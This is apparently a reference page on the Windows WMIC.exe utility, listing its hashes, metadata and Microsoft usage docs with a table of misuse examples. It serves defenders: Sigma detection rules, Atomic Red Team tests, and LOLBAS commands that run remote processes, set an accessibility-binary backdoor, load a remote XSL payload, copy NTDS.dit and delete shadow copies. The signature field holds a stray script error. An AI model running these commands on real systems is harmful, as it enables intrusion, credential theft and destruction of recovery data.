WMIC.exe

  • File Path: C:\windows\system32\wbem\WMIC.exe
  • Description: WMI Commandline Utility

Hashes

Type Hash
MD5 28C17798ECB0E8D548CEEDEC6CCE2640
SHA1 A897FBC594597BD9FFCAB75FA894F3F78B08136D
SHA256 69FE210903C3F03436FE9F00A493CDB822A64EA17A5729593BBE9EC3E0763C1B
SHA384 AA0D333A62242207DB4FA24DC25EC6B865B290633418E4A58E9E41B7CFD3042E6AE630CEA192399757F868A74F93767C
SHA512 83A40D792D4458B0DF708EA2F5F905D48518DA524B425FDF779B9B10859CCD3688B055A626186C9DFAA3A474C88D11683919459370F459844015A41C6DCB2FC1
SSDEEP 6144:r7QNSrMSNW/oTSijtBqmqRI7R3bYqkFAEsamLywzFD3whscIlGH5enh:r7DrW/oTS8qmWyI1ePFDAhSlGH0nh

Signature

  • Status: The file C:\windows\system32\wbem\WMIC.exe is not digitally signed. You cannot run this script on the current system. For more information about running scripts and setting execution policy, see about_Execution_Policies at http://go.microsoft.com/fwlink/?LinkID=135170
  • Serial: ``
  • Thumbprint: ``
  • Issuer:
  • Subject:

File Metadata

  • Original Filename: wmic.exe.mui
  • Product Name: Microsoft Windows Operating System
  • Company Name: Microsoft Corporation
  • File Version: 6.3.9600.16384 (winblue_rtm.130821-1623)
  • Product Version: 6.3.9600.16384
  • Language: English (United States)
  • Legal Copyright: Microsoft Corporation. All rights reserved.

Possible Misuse

The following table contains possible examples of WMIC.exe being misused. While WMIC.exe is not inherently malicious, its legitimate functionality can be abused for malicious purposes.

Source Source File Example License
sigma godmode_sigma_rule.yml - '\wmic.exe' DRL 1.0
sigma win_susp_logon_explicit_credentials.yml - '\wmic.exe' DRL 1.0
sigma sysmon_suspicious_remote_thread.yml - '\wmic.exe' DRL 1.0
sigma file_event_win_win_shell_write_susp_directory.yml - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma image_load_suspicious_dbghelp_dbgcore_load.yml - '\wmic.exe' DRL 1.0
sigma image_load_wmic_remote_xsl_scripting_dlls.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma image_load_wmi_module_load.yml - 'C:\Windows\System32\wbem\WMIC.exe' DRL 1.0
sigma proc_creation_win_bypass_squiblytwo.yml - '\wmic.exe' DRL 1.0
sigma proc_creation_win_crime_maze_ransomware.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_html_help_spawn.yml - '\wmic.exe' DRL 1.0
sigma proc_creation_win_local_system_owner_account_discovery.yml - Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_mal_blue_mockingbird.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_office_applications_spawning_wmi_commandline.yml - Image: '\wbem\WMIC.exe' DRL 1.0
sigma proc_creation_win_office_applications_spawning_wmi_commandline.yml - OriginalFileName: 'wmic.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - Image\|endswith: '\wbem\WMIC.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload.yml - OriginalFileName: 'wmic.exe' DRL 1.0
sigma proc_creation_win_office_from_proxy_executing_regsvr32_payload2.yml - Image\|endswith: '\wbem\WMIC.exe' DRL 1.0
sigma proc_creation_win_office_shell.yml - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma proc_creation_win_office_spawning_wmi_commandline.yml - Image\|endswith: '\wbem\WMIC.exe' DRL 1.0
sigma proc_creation_win_outlook_shell.yml - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma proc_creation_win_renamed_binary.yml - 'wmic.exe' DRL 1.0
sigma proc_creation_win_renamed_binary.yml - '\wmic.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - 'wmic.exe' DRL 1.0
sigma proc_creation_win_renamed_binary_highly_relevant.yml - '\wmic.exe' DRL 1.0
sigma proc_creation_win_shadow_copies_creation.yml - '\wmic.exe' DRL 1.0
sigma proc_creation_win_shadow_copies_deletion.yml - '\wmic.exe' DRL 1.0
sigma proc_creation_win_suspicious_ad_reco.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_susp_eventlog_clear.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_susp_recon.yml - '\WMIC.exe' DRL 1.0
sigma proc_creation_win_susp_servu_process_pattern.yml - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java.yml - '\wmic.exe' # https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/ DRL 1.0
sigma proc_creation_win_susp_shell_spawn_by_java_keytool.yml - '\wmic.exe' DRL 1.0
sigma proc_creation_win_susp_spoolsv_child_processes.yml - \wmic.exe DRL 1.0
sigma proc_creation_win_susp_wmi_execution.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_webshell_detection.yml Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_wmic_reconnaissance.yml Image\|endswith: \WMIC.exe DRL 1.0
sigma proc_creation_win_wmic_remote_service.yml Image\|endswith: \WMIC.exe DRL 1.0
sigma proc_creation_win_wmic_remove_application.yml Image\|endswith: \WMIC.exe DRL 1.0
sigma proc_creation_win_xsl_script_processing.yml - Image\|endswith: '\wmic.exe' DRL 1.0
sigma proc_creation_win_xsl_script_processing.yml - WMIC.exe FP depend on scripts and administrative methods used in the monitored environment. DRL 1.0
LOLBAS Wmic.yml Name: Wmic.exe  
LOLBAS Wmic.yml - Command: wmic.exe process call create "c:\ads\file.txt:program.exe"  
LOLBAS Wmic.yml - Command: wmic.exe process call create calc  
LOLBAS Wmic.yml - Command: wmic.exe process call create "C:\Windows\system32\reg.exe add \"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe\" /v \"Debugger\" /t REG_SZ /d \"cmd.exe\" /f"  
LOLBAS Wmic.yml - Command: wmic.exe /node:"192.168.0.1" process call create "evil.exe"  
LOLBAS Wmic.yml - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "at 9:00PM c:\GoogleUpdate.exe ^> c:\notGoogleUpdateResults.txt"  
LOLBAS Wmic.yml - Command: wmic.exe /node:REMOTECOMPUTERNAME PROCESS call create "cmd /c vssadmin create shadow /for=C:\Windows\NTDS\NTDS.dit > c:\not_the_NTDS.dit"  
LOLBAS Wmic.yml - Command: wmic.exe process get brief /format:"https://raw.githubusercontent.com/LOLBAS-Project/LOLBAS/master/OSBinaries/Payload/Wmic_calc.xsl"  
LOLBAS Wmic.yml - Command: wmic.exe process get brief /format:"\\127.0.0.1\c$\Tools\pocremote.xsl"  
LOLBAS Wmic.yml - Path: C:\Windows\System32\wbem\wmic.exe  
LOLBAS Wmic.yml - Path: C:\Windows\SysWOW64\wbem\wmic.exe  
LOLBAS Wmic.yml - IOC: DotNet CLR libraries loaded into wmic.exe  
LOLBAS Wmic.yml - IOC: DotNet CLR Usage Log - wmic.exe.log  
atomic-red-team T1047.md This test uses wmic.exe to execute a process on the local host. MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a process on a remote host. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1047.md This test uses wmic.exe to execute a DLL function using rundll32. Specify a valid value for remote IP using the node parameter. MIT License. © 2018 Red Canary
atomic-red-team T1069.001.md Utilizing wmic.exe to enumerate groups on the local system. Upon execution, information will be displayed of local groups on system. MIT License. © 2018 Red Canary
atomic-red-team T1069.001.md wmic.exe group get name MIT License. © 2018 Red Canary
atomic-red-team T1220.md | wmic_command | WMI command to execute using wmic.exe | String | process list| MIT License. © 2018 Red Canary
atomic-red-team T1490.md wmic.exe shadowcopy delete MIT License. © 2018 Red Canary
atomic-red-team T1518.001.md wmic.exe /Namespace:\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List MIT License. © 2018 Red Canary

Additional Info*

*The information below is copied from MicrosoftDocs, which is maintained by Microsoft. Available under CC BY 4.0 license.


wmic

Displays WMI information inside an interactive command shell.

Syntax

wmic </parameter>

Sub-commands

The following sub-commands are available at all times:

Sub-command Description
class Escapes from the default alias mode of WMIC to access classes in the WMI schema directly.
path Escapes from the default alias mode of WMIC to access instances in the WMI schema directly.
context Displays the current values of all global switches.
[quit | exit] Exits the WMIC command shell.

Examples

To display the current values of all global switches, type:

wmic context

Output similar to the following displays:

NAMESPACE    : root\cimv2
ROLE         : root\cli
NODE(S)      : BOBENTERPRISE
IMPLEVEL     : IMPERSONATE
[AUTHORITY   : N/A]
AUTHLEVEL    : PKTPRIVACY
LOCALE       : ms_409
PRIVILEGES   : ENABLE
TRACE        : OFF
RECORD       : N/A
INTERACTIVE  : OFF
FAILFAST     : OFF
OUTPUT       : STDOUT
APPEND       : STDOUT
USER         : N/A
AGGREGATE    : ON

To change the language ID used by the command line to English (locale ID 409), type:

wmic /locale:ms_409

Additional References


MIT License. Copyright (c) 2020-2021 Strontic.